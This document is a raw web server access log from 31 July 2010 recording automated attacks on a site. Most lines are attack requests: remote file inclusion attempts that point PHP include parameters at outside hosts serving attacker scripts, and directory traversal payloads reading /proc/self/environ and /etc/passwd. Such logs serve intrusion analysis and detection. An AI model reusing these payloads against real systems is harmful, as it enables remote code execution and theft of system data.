83.137.192.96 - - [31/Jul/2010:07:41:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:37 -0700] "GET /logs/access_100606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:41 -0700] "GET /logs/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:43 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:43 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:44 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:44 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:44 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:44 -0700] "GET /logs/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:45 -0700] "GET /logs/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:49 -0700] "GET /logs/access_100226.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /logs/access_100226.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /logs/access_100508.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /logs/access_100508.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:42:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:43:11 -0700] "GET /logs/access_100405.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:43:14 -0700] "GET /logs/access_100405.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.153.15.131 - - [31/Jul/2010:07:43:17 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:43:29 -0700] "GET /logs/access_100419.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:43:39 -0700] "GET /logs/access_100419.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /logs/access_100704.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /logs/access_100704.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /logs/access_100704.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /logs/access_100704.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:07:43:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:19 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:20 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:20 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:44:27 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:44:27 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:44:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:39 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:40 -0700] "GET /logs/access_100223.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:42 -0700] "GET /logs/access_100223.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:49 -0700] "GET /logs/access_100405.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:44:51 -0700] "GET /logs/access_100405.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:04 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:05 -0700] "GET /logs/access_100223.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:08 -0700] "GET /logs/access_100508.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:42 -0700] "GET /logs/access_100508.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:48 -0700] "GET /logs/access_100508.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:58 -0700] "GET /logs/access_100223.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:45:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:46:01 -0700] "GET /logs/access_100508.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.227.30 - - [31/Jul/2010:07:46:26 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:47:25 -0700] "GET /index1.php?x=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:47:26 -0700] "GET /logs/index1.php?x=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:47:26 -0700] "GET /logs/access_100222.log%20%20/index1.php?x=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:47:26 -0700] "GET /logs/access_100210.log%20%20/index1.php?x=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:55 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:55 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:56 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:56 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:57 -0700] "POST /logs/access_100303.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:58 -0700] "POST /logs/access_100303.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:58 -0700] "POST /logs/access_100303.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:58 -0700] "POST /logs/access_100303.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:52:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:53:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:53:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:00 -0700] "GET ////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:00 -0700] "GET /logs/access_100712.log%20%20/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:00 -0700] "GET /logs/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:17 -0700] "GET /logs/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:17 -0700] "GET /logs/access_100712.log%20%20/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:53:17 -0700] "GET ////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.227.30 - - [31/Jul/2010:07:53:31 -0700] "GET /logs/access_100716.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.227.30 - - [31/Jul/2010:07:53:32 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.227.30 - - [31/Jul/2010:07:53:33 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.227.30 - - [31/Jul/2010:07:53:56 -0700] "GET /logs/access_100625.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:54:12 -0700] "GET /logs/access_100524.log%20%20/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:07:54:38 -0700] "GET /logs/access_100524.log%20%20/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.151.149 - - [31/Jul/2010:07:55:18 -0700] "GET /index.php?option=com_flexicontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:55:35 -0700] "GET /*.php?option=com_wmtgallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:55:37 -0700] "GET /*.php?option=com_wmtgallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:45 -0700] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:45 -0700] "GET /logs/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:45 -0700] "GET /logs/access_100506.log%20/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:46 -0700] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:46 -0700] "GET /logs/access_100506.log%20/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
195.93.201.141 - - [31/Jul/2010:07:55:46 -0700] "GET /logs/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:55:53 -0700] "GET /logs/access_100212.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:55:53 -0700] "GET ///write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:55:53 -0700] "GET /logs////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:07:55:56 -0700] "GET /logs/access_100217.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:07:55:56 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:07:55:56 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:07:56:00 -0700] "GET /logs/access_100613.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:56:27 -0700] "GET /logs/access_100319.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:07:56:59 -0700] "GET ///write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:07:56:59 -0700] "GET /logs////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:07:56:59 -0700] "GET /logs/access_100212.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:57:17 -0700] "POST /logs/access_100504.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:57:17 -0700] "POST /logs/access_100504.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:57:17 -0700] "POST /logs/access_100504.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:57:17 -0700] "POST /logs/access_100504.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:07:57:19 -0700] "GET /logs/access_100319.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:58:35 -0700] "GET /logs/access_100212.log%20%20////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.201.66.120 - - [31/Jul/2010:07:58:43 -0700] "GET /logs/access_100407.log HTTP/1.1" 200 1302739 "http://www.puaga.com/logs/access_100407.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:58:54 -0700] "GET /logs/access_100319.log%20%20////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:59:29 -0700] "GET /logs/access_100306.log%20%20////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:59:39 -0700] "GET /logs/access_100328.log%20%20////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:07:59:39 -0700] "GET /logs/access_100209.log%20%20////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:08:00:34 -0700] "GET /appserv/main.php?appserv_root=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:08:00:34 -0700] "GET /logs/access_100401.log//appserv/main.php?appserv_root=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
